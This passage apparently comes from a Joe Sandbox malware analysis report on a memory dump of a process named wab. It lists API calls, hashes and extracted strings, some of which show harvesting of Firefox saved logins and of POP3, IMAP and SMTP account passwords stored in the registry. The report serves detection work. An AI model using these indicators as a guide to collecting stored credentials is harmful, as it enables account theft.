                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040E138
                                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 0040E19F
                                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 0040E1B5
                                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 0040E1CB
                                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 0040E1E1
                                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 0040E1F7
                                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 0040E20A
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040E225
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040E23C
                                                                                                                                                                                                                            • Part of subcall function 00406582: memset.MSVCRT ref: 004065A3
                                                                                                                                                                                                                            • Part of subcall function 00406582: memcmp.MSVCRT ref: 004065CD
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040E29D
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040E2B4
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040E2CB
                                                                                                                                                                                                                          • sprintf.MSVCRT ref: 0040E2E6
                                                                                                                                                                                                                          • sprintf.MSVCRT ref: 0040E2FB
                                                                                                                                                                                                                          • sprintf.MSVCRT ref: 0040E310
                                                                                                                                                                                                                          • _strcmpi.MSVCRT ref: 0040E326
                                                                                                                                                                                                                          • _strcmpi.MSVCRT ref: 0040E33F
                                                                                                                                                                                                                          • _strcmpi.MSVCRT ref: 0040E358
                                                                                                                                                                                                                          • _strcmpi.MSVCRT ref: 0040E374
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$_mbscpy$_strcmpi$sprintf$strlen$CloseFileHandleSize_mbsicmpmemcmp
                                                                                                                                                                                                                          • String ID: C@$encryptedPassword$encryptedUsername$hostname$httpRealm$imap://%s$logins$mailbox://%s$passwordField$smtp://%s$usernameField
                                                                                                                                                                                                                          • API String ID: 4171719235-3249434271
                                                                                                                                                                                                                          • Opcode ID: b0d5c0670ed8c74d0c8e3b60901706fc2ec35adaa3e3620046f1bbd10783a5e2
                                                                                                                                                                                                                          • Instruction ID: 4eb083177fa9c3dcba641838e0e399a852ec85db15ddf69852980c8670b79128
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b0d5c0670ed8c74d0c8e3b60901706fc2ec35adaa3e3620046f1bbd10783a5e2
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EFA16672D04219AEDF10EBA1DC41ADE77BCAF44304F1044BFF645B7181DA38AA988F59
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 0040FDA3
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E8), ref: 0040FDAF
                                                                                                                                                                                                                          • GetWindowLongA.USER32(00000000,000000F0), ref: 0040FDBE
                                                                                                                                                                                                                          • GetWindowLongA.USER32(?,000000F0), ref: 0040FDCA
                                                                                                                                                                                                                          • GetWindowLongA.USER32(00000000,000000EC), ref: 0040FDD3
                                                                                                                                                                                                                          • GetWindowLongA.USER32(?,000000EC), ref: 0040FDDF
                                                                                                                                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 0040FDF1
                                                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 0040FDFC
                                                                                                                                                                                                                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0040FE10
                                                                                                                                                                                                                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0040FE1E
                                                                                                                                                                                                                          • GetDC.USER32 ref: 0040FE57
                                                                                                                                                                                                                          • strlen.MSVCRT ref: 0040FE97
                                                                                                                                                                                                                          • GetTextExtentPoint32A.GDI32(?,00000000,00000000,?), ref: 0040FEA8
                                                                                                                                                                                                                          • ReleaseDC.USER32(?,?), ref: 0040FEF5
                                                                                                                                                                                                                          • sprintf.MSVCRT ref: 0040FFB5
                                                                                                                                                                                                                          • SetWindowTextA.USER32(?,?), ref: 0040FFC9
                                                                                                                                                                                                                          • SetWindowTextA.USER32(?,00000000), ref: 0040FFE7
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,00000001), ref: 0041001D
                                                                                                                                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 0041002D
                                                                                                                                                                                                                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041003B
                                                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 00410052
                                                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 0041005C
                                                                                                                                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 004100A2
                                                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 004100AC
                                                                                                                                                                                                                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 004100E4
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
                                                                                                                                                                                                                          • String ID: %s:$EDIT$STATIC
                                                                                                                                                                                                                          • API String ID: 1703216249-3046471546
                                                                                                                                                                                                                          • Opcode ID: 8a60e0ba97f171743a829e93ce0ff1a0e7cc565a63bc43af7584db32dade8b22
                                                                                                                                                                                                                          • Instruction ID: 60093129ffb9b10d71bc98ba01756b195f92c815bd96d79b3314cc8c80e42073
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8a60e0ba97f171743a829e93ce0ff1a0e7cc565a63bc43af7584db32dade8b22
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 62B1DE71108741AFDB20DF68C985E6BBBE9FF88704F00492EF69992261DB75E804CF56
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 004024E7
                                                                                                                                                                                                                            • Part of subcall function 00410452: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C69,?,?,?,?,00401C69,?,?,?), ref: 0041046D
                                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 00402525
                                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 004025EF
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _mbscpy$QueryValuememset
                                                                                                                                                                                                                          • String ID: HTTPMail$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$Password2$SMTP$SMTP Display Name$SMTP Email Address$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
                                                                                                                                                                                                                          • API String ID: 168965057-606283353
                                                                                                                                                                                                                          • Opcode ID: d04dcaea7970b63fee6828c7dcfe30098fc49b177350675b76886810d8c329c2
                                                                                                                                                                                                                          • Instruction ID: 01ace8319ffdb9fe87aab8cc910760b0be55d28e69d7af66dfccc1b3ad16f9ad
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d04dcaea7970b63fee6828c7dcfe30098fc49b177350675b76886810d8c329c2
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 815163B540161CEBEF20DF91DC85ADD7BACAF04318F50846BFA08A6142D7BD9584CF98
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040285B
                                                                                                                                                                                                                            • Part of subcall function 00402994: RegQueryValueExA.ADVAPI32(00000400,?,00000000,?,?,?), ref: 004029C5
                                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 00402895
                                                                                                                                                                                                                            • Part of subcall function 00402994: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004029F3
                                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 0040296D
                                                                                                                                                                                                                            • Part of subcall function 0041042B: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402928,?,?,?,?,00402928,?,?), ref: 0041044A
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: QueryValue_mbscpy$ByteCharMultiWidememset
                                                                                                                                                                                                                          • String ID: Display Name$Email$HTTP$HTTP Port$HTTP Server URL$HTTP User$HTTPMail Use SSL$IMAP$IMAP Port$IMAP Server$IMAP Use SPA$IMAP User$POP3$POP3 Port$POP3 Server$POP3 Use SPA$POP3 User$Password$SMTP$SMTP Port$SMTP Server$SMTP Use SSL$SMTP User
                                                                                                                                                                                                                          • API String ID: 1497257669-167382505
                                                                                                                                                                                                                          • Opcode ID: fb3ed3ae92ef97c750fd38775156bd4655232a824b152189a5320ea8a9642570
                                                                                                                                                                                                                          • Instruction ID: 24fe9e335227be75b4da69fc4be99485a809f42695e36ab36f90f83f1315ab2f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fb3ed3ae92ef97c750fd38775156bd4655232a824b152189a5320ea8a9642570
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 22514DB150060C9BEF25EF61DC85ADD7BA8FF04308F50802BF924661A2DBB99958CF48
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • EndDialog.USER32(?,?), ref: 0040F600
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EA), ref: 0040F618
                                                                                                                                                                                                                          • SendMessageA.USER32(00000000,000000B1,00000000,0000FFFF), ref: 0040F637
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000301,00000000,00000000), ref: 0040F644
                                                                                                                                                                                                                          • SendMessageA.USER32(?,000000B1,00000000,00000000), ref: 0040F64D
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040F675
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040F695
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040F6B3
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040F6CC
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040F6EA
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040F703
                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 0040F70B
                                                                                                                                                                                                                          • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0040F730
                                                                                                                                                                                                                          • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0040F766
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040F7BD
                                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 0040F7CB
                                                                                                                                                                                                                          • memcpy.MSVCRT ref: 0040F7FA
                                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 0040F81C
                                                                                                                                                                                                                          • sprintf.MSVCRT ref: 0040F887
                                                                                                                                                                                                                          • SetDlgItemTextA.USER32(?,000003EA,?), ref: 0040F8A0
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EA), ref: 0040F8AA
                                                                                                                                                                                                                          • SetFocus.USER32(00000000), ref: 0040F8B1
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s, xrefs: 0040F881
                                                                                                                                                                                                                          • {Unknown}, xrefs: 0040F67A
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_mbscpymemcpysprintf
                                                                                                                                                                                                                          • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s${Unknown}
                                                                                                                                                                                                                          • API String ID: 1428123949-3474136107
                                                                                                                                                                                                                          • Opcode ID: b9341adbc2cd016ad37feae7563ea95aa4c33f034ac246c3141dbd5b744c5ef9
                                                                                                                                                                                                                          • Instruction ID: eaf6f4841f79e9ca67ab0c8a61f7093b44a411cbafad24e33deb6097971d8b5c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b9341adbc2cd016ad37feae7563ea95aa4c33f034ac246c3141dbd5b744c5ef9
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4271B576404344BFEB31ABA0DC41EDB7B9CFB94345F00443AF644A25A1DB399D18CB6A
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 004010BC
                                                                                                                                                                                                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 004010CE
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 00401103
                                                                                                                                                                                                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401110
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 0040113E
                                                                                                                                                                                                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401150
                                                                                                                                                                                                                          • LoadCursorA.USER32(00000067), ref: 0040115F
                                                                                                                                                                                                                          • SetCursor.USER32(00000000,?,?), ref: 00401166
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 00401186
                                                                                                                                                                                                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401193
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 004011AD
                                                                                                                                                                                                                          • SetBkMode.GDI32(?,00000001), ref: 004011B9
                                                                                                                                                                                                                          • SetTextColor.GDI32(?,00C00000), ref: 004011C7
                                                                                                                                                                                                                          • GetSysColorBrush.USER32(0000000F), ref: 004011CF
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 004011EF
                                                                                                                                                                                                                          • EndDialog.USER32(?,00000001), ref: 0040121A
                                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 00401226
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003ED), ref: 0040124A
                                                                                                                                                                                                                          • ShowWindow.USER32(00000000), ref: 00401253
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 0040125F
                                                                                                                                                                                                                          • ShowWindow.USER32(00000000), ref: 00401262
                                                                                                                                                                                                                          • SetDlgItemTextA.USER32(?,000003EE,00451398), ref: 00401273
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040128E
                                                                                                                                                                                                                          • SetWindowTextA.USER32(?,00000000), ref: 004012AA
                                                                                                                                                                                                                          • SetDlgItemTextA.USER32(?,000003EA,?), ref: 004012C2
                                                                                                                                                                                                                          • SetDlgItemTextA.USER32(?,000003EC,?), ref: 004012D3
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2998058495-0
                                                                                                                                                                                                                          • Opcode ID: 0f9c4242ba45eb06dd3dfa1dd6db45fade88f32ef90b46f4d12f3d9a9e08a6d1
                                                                                                                                                                                                                          • Instruction ID: cf74e5707885198988a29297af0a26d915b41f86d4ff93bb74c60bb1bb3fb963
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0f9c4242ba45eb06dd3dfa1dd6db45fade88f32ef90b46f4d12f3d9a9e08a6d1
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 04618B35800208EBDF12AFA0DD85BAE7FA5BB04305F1481B6F904BA2F2C7B59950DF58
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00408DE1: LoadMenuA.USER32(00000000), ref: 00408DE9
                                                                                                                                                                                                                            • Part of subcall function 00408DE1: sprintf.MSVCRT ref: 00408E0C
                                                                                                                                                                                                                          • SetMenu.USER32(?,00000000), ref: 0040BA7E
                                                                                                                                                                                                                          • SendMessageA.USER32(00000000,00000404,00000001,?), ref: 0040BAB1
                                                                                                                                                                                                                          • LoadImageA.USER32(00000068,00000000,00000000,00000000,00009060), ref: 0040BAC7
                                                                                                                                                                                                                          • CreateWindowExA.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000), ref: 0040BB27
                                                                                                                                                                                                                          • LoadIconA.USER32(00000066,00000000), ref: 0040BB96
                                                                                                                                                                                                                          • _strcmpi.MSVCRT ref: 0040BBEE
                                                                                                                                                                                                                          • RegDeleteKeyA.ADVAPI32(80000001,0044551F), ref: 0040BC03
                                                                                                                                                                                                                          • SetFocus.USER32(?), ref: 0040BC29
                                                                                                                                                                                                                          • GetFileAttributesA.KERNEL32(004518C0), ref: 0040BC42
                                                                                                                                                                                                                          • GetTempPathA.KERNEL32(00000104,004518C0), ref: 0040BC52
                                                                                                                                                                                                                          • strlen.MSVCRT ref: 0040BC59
                                                                                                                                                                                                                          • strlen.MSVCRT ref: 0040BC67
                                                                                                                                                                                                                          • RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 0040BCC3
                                                                                                                                                                                                                            • Part of subcall function 00404B82: strlen.MSVCRT ref: 00404B9F
                                                                                                                                                                                                                            • Part of subcall function 00404B82: SendMessageA.USER32(00000000,0000101B,00000000,?), ref: 00404BC3
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000404,00000002,?), ref: 0040BD0E
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000401,00001001,00000000), ref: 0040BD21
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040BD36
                                                                                                                                                                                                                          • SetWindowTextA.USER32(?,?), ref: 0040BD5A
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$Loadstrlen$MenuWindow$AttributesClipboardCreateDeleteFileFocusFormatIconImagePathRegisterTempText_strcmpimemsetsprintf
                                                                                                                                                                                                                          • String ID: /noloadsettings$SysListView32$commdlg_FindReplace$report.html
                                                                                                                                                                                                                          • API String ID: 2303586283-933021314
                                                                                                                                                                                                                          • Opcode ID: bc2ea265da4b9d7fbf42eb82516b20c9e5d99f5c25abf20ff2f7a7fba55c6b61
                                                                                                                                                                                                                          • Instruction ID: a3034197930a53117d85b49231bdaaa03d04473d70278c5121b5a691f959c143
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bc2ea265da4b9d7fbf42eb82516b20c9e5d99f5c25abf20ff2f7a7fba55c6b61
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 13C1E0B1644788FFEB16DF64CC45BDABBA5FF14304F00016AFA44AB292C7B59904CB99
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _mbscat$memsetsprintf$_mbscpy
                                                                                                                                                                                                                          • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                                                                                                                                          • API String ID: 633282248-1996832678
                                                                                                                                                                                                                          • Opcode ID: d48ae4295fbb277336b7674ab4026529653ef1736987acc8de4e4bffa9c8da66
                                                                                                                                                                                                                          • Instruction ID: 7c6bf41bc1280a1bc88d4c6d4cc59bc6a86d5934fc3475aca932ea250c86fdc0
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d48ae4295fbb277336b7674ab4026529653ef1736987acc8de4e4bffa9c8da66
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5E31E7B2805324BEFB14EA54DD42EDEB76CAF11354F20415FF214A2182DBBC9ED48A9D
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memsetsprintf$_mbscpy$FileWrite_mbscatstrlen
                                                                                                                                                                                                                          • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                                                                                                                                          • API String ID: 710961058-601624466
                                                                                                                                                                                                                          • Opcode ID: 6b5a2a585f50ca3eac413cecb2812d02d42192bb924b4e36303969acff340374
                                                                                                                                                                                                                          • Instruction ID: 74eb9a4e80b6148bc8e6745fd37c56fddd23ac0c0a2d0b32ddfd32f18a43723b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6b5a2a585f50ca3eac413cecb2812d02d42192bb924b4e36303969acff340374
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BC61B232900214AFEF14EF64CC81EDE7B79EF05314F10419AF905AB1D2DB749A55CB55
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: sprintf$memset$_mbscpy
                                                                                                                                                                                                                          • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                                                                                                                          • API String ID: 3402215030-3842416460
                                                                                                                                                                                                                          • Opcode ID: 17ed6d14846e4c5c10a4de3d65ab3a3dc687bb0adce687871bc2f7fa502a4f2e
                                                                                                                                                                                                                          • Instruction ID: 369df5ceca9bdb9f61db2c44a96b4e719fee50907ea6fa1c749cf0cc9e3d70a7
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 17ed6d14846e4c5c10a4de3d65ab3a3dc687bb0adce687871bc2f7fa502a4f2e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CC4176B684011DAEEB11EE54DC41FEB776CAF55305F0401EBB608E2142E7789F988FA9
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memcmp$memcpy
                                                                                                                                                                                                                          • String ID: %s mode not allowed: %s$BINARY$access$cache$file:$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s$vfs
                                                                                                                                                                                                                          • API String ID: 231171946-1411472696
                                                                                                                                                                                                                          • Opcode ID: ee0957bba9a21b500f81e6c25a2f981e0bf1c959c719be955f11db3b2c6e13f4
                                                                                                                                                                                                                          • Instruction ID: 52e3131474fa5b42b7a716d11f9a5693575ad96a685679239bae0d8a086cc604
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ee0957bba9a21b500f81e6c25a2f981e0bf1c959c719be955f11db3b2c6e13f4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6ED13571D40209AAFF24CF99C8807EFBBB1AF15349F24405FE84197361E3789AC68B59
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
                                                                                                                                                                                                                          • String ID: .cfg$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos$lD
                                                                                                                                                                                                                          • API String ID: 1012775001-1916105108
                                                                                                                                                                                                                          • Opcode ID: 122b63003726a974bfadc130288c83bc1cbd12b8fd6105304b92718d22d06189
                                                                                                                                                                                                                          • Instruction ID: 0f0ca2c9629047d536013ad0a00a476c63862c7e4230734d296e8a5f64e20069
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 122b63003726a974bfadc130288c83bc1cbd12b8fd6105304b92718d22d06189
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 41415A72940118ABDB20DB54CC88FDAB7BCAB59300F4541EAF50DE7192DA74AA858FA4
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 004078B8: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040EAAB,?,?,?,?), ref: 004078D1
                                                                                                                                                                                                                            • Part of subcall function 004078B8: CloseHandle.KERNEL32(00000000,?,?,?), ref: 004078FD
                                                                                                                                                                                                                            • Part of subcall function 004045BD: ??3@YAXPAX@Z.MSVCRT ref: 004045C4
                                                                                                                                                                                                                            • Part of subcall function 00406DD3: _mbscpy.MSVCRT ref: 00406DD8
                                                                                                                                                                                                                            • Part of subcall function 00406DD3: strrchr.MSVCRT ref: 00406DE0
                                                                                                                                                                                                                            • Part of subcall function 0040D7EA: memset.MSVCRT ref: 0040D80B
                                                                                                                                                                                                                            • Part of subcall function 0040D7EA: memset.MSVCRT ref: 0040D81F
                                                                                                                                                                                                                            • Part of subcall function 0040D7EA: memset.MSVCRT ref: 0040D833
                                                                                                                                                                                                                            • Part of subcall function 0040D7EA: memcpy.MSVCRT ref: 0040D900
